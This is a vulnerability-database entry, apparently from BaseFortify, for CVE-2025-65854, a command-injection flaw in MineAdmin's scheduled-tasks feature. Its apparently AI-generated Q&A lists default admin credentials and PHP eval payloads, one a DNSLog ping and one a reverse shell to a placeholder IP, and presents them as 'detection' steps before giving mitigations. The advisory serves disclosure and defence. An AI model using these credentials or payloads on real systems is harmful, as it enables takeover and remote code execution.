CVE-2025-65854
BaseFortify
Publication date: 2025-12-12
Last updated on: 2025-12-19
Assigner: MITRE
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| mineadmin | mineadmin | to 3.0 (exc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-94 | The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
This vulnerability is due to insecure permissions in the scheduled tasks feature of MineAdmin version 3.x, which allows attackers to execute arbitrary commands and potentially take over the entire user account.
How can this vulnerability impact me? :
An attacker exploiting this vulnerability can run any command they choose on the affected system and gain full control over the user account, leading to potential unauthorized access and control.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by attempting to log in using the default credentials (Username: superAdmin, Password: admin123) or by brute-forcing the superAdmin password. After gaining access, check the 'Scheduled Tasks' section under 'Tools' for any suspicious or unauthorized scheduled tasks that may contain malicious payloads. For command verification, you can use payloads such as `eval('system("ping -c 4 xxxxxxxx.dnslog.cn");');` to trigger DNSLog verification or test for reverse shell execution with payloads like `eval('$s=stream_socket_client("tcp://[REVERSE_SHELL_IP]:[PORT]");proc_open("/bin/sh -i", array(0=>$s,1=>$s,2=>$s),$p);');`. Monitoring network traffic for unusual outbound connections (e.g., ping or reverse shell attempts) can also help detect exploitation attempts. [2]
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include changing the default superAdmin credentials to a strong, unique password to prevent unauthorized access. Restrict access to the 'Scheduled Tasks' feature to trusted administrators only. Review and remove any unauthorized scheduled tasks that may contain malicious payloads. Additionally, monitor logs and network traffic for suspicious activity related to scheduled task execution. Applying any available patches or updates from MineAdmin that address this insecure permissions issue is also recommended. [2]